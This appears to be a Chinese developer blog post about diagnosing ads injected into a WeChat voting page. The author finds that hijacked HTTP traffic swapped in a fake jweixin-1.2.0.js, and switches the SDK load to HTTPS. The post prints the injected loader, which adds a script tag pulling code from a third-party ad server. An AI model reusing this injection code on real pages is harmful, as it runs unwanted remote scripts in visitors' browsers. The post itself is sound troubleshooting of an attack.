这几天在做一个微信的投票网页,用的是vue+quasar UI框架,结果这几天发现偶尔上网页后有广告,如下图红色方框


以为自己的虚拟主机被攻击,但反复检查了都感觉没啥问题,然后怀疑是不是quasar这个框架有问题,因为我第一次用这个UI框架,是外国的,看着很正规的,也是反复查了,也没发现什么问题,也不是一直会出现,偶尔才出现一次,我就一直刷新,我先是截了正常时的网络访问状况



不知刷新了多久,终于刷出了广告,看!果然有问题了,jwexin-1.2.0.js这个是微信网页jssdk的文件,可这个为啥下面又重新加载了还带上了参数



我点了第一个jsweixin-1.2.0.js,果然发现了问题了,这就是生成广告的脚本



这是广告js的代码

var _atn_obj_ = new Object; 
_atn_obj_.oldurl = 'http://res.wx.qq.com/open/js/jweixin-1.2.0.js?cHVzaA=1513177208'; 
_atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7My4PMz8jMzcjKzcrHoMrNzc3Lg7bfxtHO0dLOg82Dy8vPys/Pg86DzsrOzM7IyM3Px4POys7MzsjIzc/Hz8vLzs7IzYPKzcrJyw=='; 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);


到此我的代码没问题,可能就是所谓的dns劫持了

我将微信jssdk引用方式改成https,好像有点效果

<script type='text/javascript' src='https://res.wx.qq.com/open/js/jweixin-1.2.0.js'></script>



Logo

前往低代码交流专区

更多推荐